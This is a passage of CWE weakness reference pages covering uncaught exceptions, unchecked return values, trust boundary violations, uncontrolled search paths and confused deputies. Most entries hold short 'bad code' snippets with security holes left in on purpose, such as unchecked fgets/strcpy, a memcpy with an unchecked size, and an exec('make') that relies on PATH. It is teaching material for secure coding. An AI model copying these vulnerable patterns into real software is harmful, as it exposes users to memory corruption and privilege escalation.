... } Although the validate method is implemented in this example the method does not call the validate method of the ValidatorForm parent class with a call super.validate(). Without the call to the parent validator class only the custom validation will be performed and the default validation will not be performed. The following example shows that the validate method of the ValidatorForm class is called within the implementation of the validate method. (good code)
Example Language: Java
public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {
// private variables for registration form
private String name; private String email; ... public RegistrationForm() { super(); }public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) { ActionErrors errors = super.validate(mapping, request);
if (errors == null) { errors = new ActionErrors(); }if (getName() == null || getName().length() < 1) { errors.add("name", new ActionMessage("error.name.required")); }return errors; // getter and setter methods for private variables }...
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This could introduce other weaknesses related to missing input validation.
Maintenance
The current description implies a loose composite of two separate weaknesses, so this node might need to be split or converted into a low-level category.
CWE-402: Transmission of Private Resources into a New Sphere ('Resource Leak')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product makes resources available to untrusted parties when those resources are only intended to be accessed by the product.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-501: Trust Boundary Violation
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product mixes trusted and untrusted data in the same data structure or structured message.
A trust boundary can be thought of as line drawn through a program. On one side of the line, data is untrusted. On the other side of the line, data is assumed to be trustworthy. The purpose of validation logic is to allow data to safely cross the trust boundary - to move from untrusted to trusted. A trust boundary violation occurs when a program blurs the line between what is trusted and what is untrusted. By combining trusted and untrusted data in the same data structure, it becomes easier for programmers to mistakenly trust unvalidated data.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code accepts an HTTP request and stores the username parameter in the HTTP session object before checking to ensure that the user has been authenticated. (bad code)
Example Language: Java
usrname = request.getParameter("usrname");
if (session.getAttribute(ATTR_USR) == null) { session.setAttribute(ATTR_USR, usrname); }(bad code)
Example Language: C#
usrname = request.Item("usrname");
if (session.Item(ATTR_USR) == null) { session.Add(ATTR_USR, usrname); }Without well-established and maintained trust boundaries, programmers will inevitably lose track of which pieces of data have been validated and which have not. This confusion will eventually allow some data to be used without first being validated.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-248: Uncaught Exception
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
When an exception is not caught, it may cause the program to crash or expose sensitive information.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "CISQ Quality Measures (2020)" (View-1305)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following example attempts to resolve a hostname. (bad code)
Example Language: Java
protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {
String ip = req.getRemoteAddr(); }InetAddress addr = InetAddress.getByName(ip); ... out.println("hello " + addr.getHostName()); A DNS lookup failure will cause the Servlet to throw an exception. Example 2 The _alloca() function allocates memory on the stack. If an allocation request is too large for the available stack space, _alloca() throws an exception. If the exception is not caught, the program will crash, potentially enabling a denial of service attack. _alloca() has been deprecated as of Microsoft Visual Studio 2005(R). It has been replaced with the more secure _alloca_s(). Example 3 EnterCriticalSection() can raise an exception, potentially causing the program to crash. Under operating systems prior to Windows 2000, the EnterCriticalSection() function can raise an exception in low memory situations. If the exception is not caught, the program will crash, potentially enabling a denial of service attack. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-391: Unchecked Error Condition
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "CISQ Quality Measures (2020)" (View-1305)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code excerpt ignores a rarely-thrown exception from doExchange(). (bad code)
Example Language: Java
try {
doExchange(); }catch (RareException e) { // this can never happen If a RareException were to ever be thrown, the program would continue to execute as though nothing unusual had occurred. The program records no evidence indicating the special situation, potentially frustrating any later attempt to explain the program's behavior.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other When a programmer ignores an exception, they implicitly state that they are operating under one of two assumptions:
Maintenance
This entry is slated for deprecation; it has multiple widespread interpretations by CWE analysts. It currently combines information from three different taxonomies, but each taxonomy is talking about a slightly different issue. CWE analysts might map to this entry based on any of these issues. 7PK has "Empty Catch Block" which has an association with empty exception block (CWE-1069); in this case, the exception has performed the check, but does not handle. In PLOVER there is "Unchecked Return Value" which is CWE-252, but unlike "Empty Catch Block" there isn't even a check of the issue - and "Unchecked Error Condition" implies lack of a check. For CLASP, "Uncaught Exception" (CWE-248) is associated with incorrect error propagation - uncovered in CWE 3.2 and earlier, at least. There are other issues related to error handling and checks.
CWE-252: Unchecked Return Value
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not check the return value from a method or function, which can prevent it from detecting unexpected states and conditions.
Two common programmer assumptions are "this function call can never fail" and "it doesn't matter if this function call fails". If an attacker can force the function to fail or otherwise return a value that is not expected, then the subsequent program logic could lead to a vulnerability, because the product is not in a state that the programmer assumes. For example, if the program calls a function to drop privileges but does not check the return code to ensure that privileges were successfully dropped, then the program will continue to operate with the higher privileges.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Consider the following code segment: (bad code)
Example Language: C
char buf[10], cp_buf[10];
fgets(buf, 10, stdin); strcpy(cp_buf, buf); The programmer expects that when fgets() returns, buf will contain a null-terminated string of length 9 or less. But if an I/O error occurs, fgets() will not null-terminate buf. Furthermore, if the end of the file is reached before any characters are read, fgets() returns without writing anything to buf. In both of these situations, fgets() signals that something unusual has happened by returning NULL, but in this code, the warning will not be noticed. The lack of a null terminator in buf can result in a buffer overflow in the subsequent call to strcpy(). Example 2 In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed: (bad code)
Example Language: C
int returnChunkSize(void *) {
/* if chunk info is valid, return the size of usable memory, * else, return -1 to indicate an error */ ... int main() { ... }memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1)); ... If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788). Example 3 The following code does not check to see if memory allocation succeeded before attempting to use the pointer returned by malloc(). (bad code)
Example Language: C
buf = (char*) malloc(req_size);
strncpy(buf, xfer, req_size); The traditional defense of this coding error is: "If my program runs out of memory, it will fail. It doesn't matter whether I handle the error or allow the program to die with a segmentation fault when it tries to dereference the null pointer." This argument ignores three important considerations:
Example 4 The following examples read a file into a byte array. (bad code)
Example Language: C#
char[] byteArray = new char[1024];
for (IEnumerator i=users.GetEnumerator(); i.MoveNext() ;i.Current()) { String userName = (String) i.Current(); }String pFileName = PFILE_ROOT + "/" + userName; StreamReader sr = new StreamReader(pFileName); sr.Read(byteArray,0,1024);//the file is always 1k bytes sr.Close(); processPFile(userName, byteArray); (bad code)
Example Language: Java
FileInputStream fis;
byte[] byteArray = new byte[1024]; for (Iterator i=users.iterator(); i.hasNext();) { String userName = (String) i.next();
String pFileName = PFILE_ROOT + "/" + userName; FileInputStream fis = new FileInputStream(pFileName); fis.read(byteArray); // the file is always 1k bytes fis.close(); processPFile(userName, byteArray); The code loops through a set of users, reading a private data file for each user. The programmer assumes that the files are always 1 kilobyte in size and therefore ignores the return value from Read(). If an attacker can create a smaller file, the program will recycle the remainder of the data from the previous user and treat it as though it belongs to the attacker. Example 5 The following code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference. (bad code)
Example Language: Java
String itemName = request.getParameter(ITEM_NAME);
if (itemName.compareTo(IMPORTANT_ITEM) == 0) { ... }... The following code does not check to see if the string returned by the Item property is null before calling the member function Equals(), potentially causing a NULL dereference. (bad code)
Example Language: Java
String itemName = request.Item(ITEM_NAME);
if (itemName.Equals(IMPORTANT_ITEM)) { ... }... The traditional defense of this coding error is: "I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn't matter whether I handle the error or allow the program to die dereferencing a null value." But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved. Example 6 The following code shows a system property that is set to null and later dereferenced by a programmer who mistakenly assumes it will always be defined. (bad code)
Example Language: Java
System.clearProperty("os.name");
... String os = System.getProperty("os.name"); if (os.equalsIgnoreCase("Windows 95")) System.out.println("Not supported"); The traditional defense of this coding error is: "I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn't matter whether I handle the error or allow the program to die dereferencing a null value." But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved. Example 7 The following VB.NET code does not check to make sure that it has read 50 bytes from myfile.txt. This can cause DoDangerousOperation() to operate on an unexpected value. (bad code)
Example Language: C#
Dim MyFile As New FileStream("myfile.txt", FileMode.Open, FileAccess.Read, FileShare.Read)
Dim MyArray(50) As Byte MyFile.Read(MyArray, 0, 50) DoDangerousOperation(MyArray(20)) In .NET, it is not uncommon for programmers to misunderstand Read() and related methods that are part of many System.IO classes. The stream and reader classes do not consider it to be unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested. Example 8 It is not uncommon for Java programmers to misunderstand read() and related methods that are part of many java.io classes. Most errors and unusual events in Java result in an exception being thrown. But the stream and reader classes do not consider it unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested. This behavior makes it important for programmers to examine the return value from read() and other IO methods to ensure that they receive the amount of data they expect. Example 9 This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. (bad code)
Example Language: C
void host_lookup(char *user_supplied_addr){
struct hostent *hp;
in_addr_t *addr; char hostname[64]; in_addr_t inet_addr(const char *cp); /*routine that ensures user_supplied_addr is in the right format for conversion */ validate_addr_form(user_supplied_addr); addr = inet_addr(user_supplied_addr); hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET); strcpy(hostname, hp->h_name); If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference (CWE-476) would then occur in the call to strcpy(). Note that this code is also vulnerable to a buffer overflow (CWE-119). Example 10 The following function attempts to acquire a lock in order to perform operations on a shared resource. (bad code)
Example Language: C
void f(pthread_mutex_t *mutex) {
pthread_mutex_lock(mutex);
/* access shared resource */ pthread_mutex_unlock(mutex); However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior. In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels. (good code)
Example Language: C
int f(pthread_mutex_t *mutex) {
int result;
result = pthread_mutex_lock(mutex); if (0 != result) return result;
/* access shared resource */ return pthread_mutex_unlock(mutex); Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-427: Uncontrolled Search Path Element
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses a fixed or controlled search path to find resources, but one or more locations in that path can be under the control of unintended actors.
Although this weakness can occur with any type of resource, it is frequently introduced when a product uses a directory search path to find executables or code libraries, but the path contains a directory that can be modified by an attacker, such as "/tmp" or the current working directory. In Windows-based systems, when the LoadLibrary or LoadLibraryEx function is called with a DLL name that does not contain a fully qualified path, the function follows a search order that includes two path elements that might be uncontrolled:
In some cases, the attack can be conducted remotely, such as when SMB or WebDAV network shares are used. One or more locations in that path could include the Windows drive root or its subdirectories. This often exists in Linux-based code assuming the controlled nature of the root directory (/) or its subdirectories (/etc, etc), or a code that recursively accesses the parent directory. In Windows, the drive root and some of its subdirectories have weak permissions by default, which makes them uncontrolled. In some Unix-based systems, a PATH might be created that contains an empty element, e.g. by splicing an empty variable into the PATH. This empty element can be interpreted as equivalent to the current working directory, which might be an untrusted search element. In software package management frameworks (e.g., npm, RubyGems, or PyPi), the framework may identify dependencies on third-party libraries or other packages, then consult a repository that contains the desired package. The framework may search a public repository before a private repository. This could be exploited by attackers by placing a malicious package in the public repository that has the same name as a package from the private repository. The search path might not be directly under control of the developer relying on the framework, but this search order effectively contains an untrusted element.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code is from a web application that allows users access to an interface through which they can update their password on the system. In this environment, user passwords can be managed using the Network Information System (NIS), which is commonly used on UNIX systems. When performing NIS updates, part of the process for updating passwords is to run a make command in the /var/yp directory. Performing NIS updates requires extra privileges. (bad code)
Example Language: Java
...
System.Runtime.getRuntime().exec("make"); ... The problem here is that the program does not specify an absolute path for make and does not clean its environment prior to executing the call to Runtime.exec(). If an attacker can modify the $PATH variable to point to a malicious binary called make and cause the program to be executed in their environment, then the malicious binary will be loaded instead of the one intended. Because of the nature of the application, it runs with the privileges necessary to perform system operations, which means the attacker's make will now be run with these privileges, possibly giving the attacker complete control of the system. Example 2 In versions of Go prior to v1.19, the LookPath function would follow the conventions of the runtime OS and look for a program in the directiories listed in the current path [REF-1325]. Therefore, Go would prioritize searching the current directory when the provided command name does not contain a directory separator and continued to search for programs even when the specified program name is empty. Consider the following where an application executes a git command to run on the system. (bad code)
Example Language: Go
func ExecuteGitCommand(name string, arg []string) error {
c := exec.Command(name, arg...)
}var err error c.Path, err = exec.LookPath(name) if err != nil {
return err
}An attacker could create a malicious repository with a file named ..exe and another file named git.exe. If git.exe is not found in the system PATH, then ..exe would execute [REF-1326]. Example 3 In February 2021 [REF-1169], a researcher was able to demonstrate the ability to breach major technology companies by using "dependency confusion" where the companies would download and execute untrusted packages. The researcher discovered the names of some internal, private packages by looking at dependency lists in public source code, such as package.json. The researcher then created new, untrusted packages with the same name as the internal packages, then uploaded them to package hosting services. These services included the npm registry for Node, PyPi for Python, and RubyGems. In affected companies, their dependency resolution would search the public hosting services first before consulting their internal service, causing the untrusted packages to be automatically downloaded and executed. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
Unlike untrusted search path (CWE-426), which inherently involves control over the definition of a control sphere (i.e., modification of a search path), this entry concerns a fixed control sphere in which some part of the sphere may be under attacker control (i.e., the search path cannot be modified by an attacker, but one element of the path can be under attacker control).
CWE-394: Unexpected Status Code or Return Value
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not properly check when a function or operation returns a value that is legitimate for the function, but is not expected by the product.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
Usually primary, but can be resultant from issues such as behavioral change or API abuse. This can produce resultant vulnerabilities.
CWE-447: Unimplemented or Unsupported Feature in UI
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterA UI function for a security feature appears to be supported and gives feedback to the user that suggests that it is supported, but the underlying functionality is not implemented.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Research Gap
This issue needs more study, as there are not many examples. It is not clear whether it is primary or resultant.
CWE-441: Unintended Proxy or Intermediary ('Confused Deputy')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product receives a request, message, or directive from an upstream component, but the product does not sufficiently preserve the original source of the request before forwarding the request to an external actor that is outside of the product's control sphere. This causes the product to appear to be the source of the request, leading it to act as a proxy or other intermediary between the upstream component and the external actor.
If an attacker cannot directly contact a target, but the product has access to the target, then the attacker can send a request to the product and have it be forwarded to the target. The request would appear to be coming from the product's system, not the attacker's system. As a result, the attacker can bypass access controls (such as firewalls) or hide the source of malicious requests, since the requests would not be coming directly from the attacker. Since proxy functionality and message-forwarding often serve a legitimate purpose, this issue only becomes a vulnerability when:
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "Hardware Design" (View-1194)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
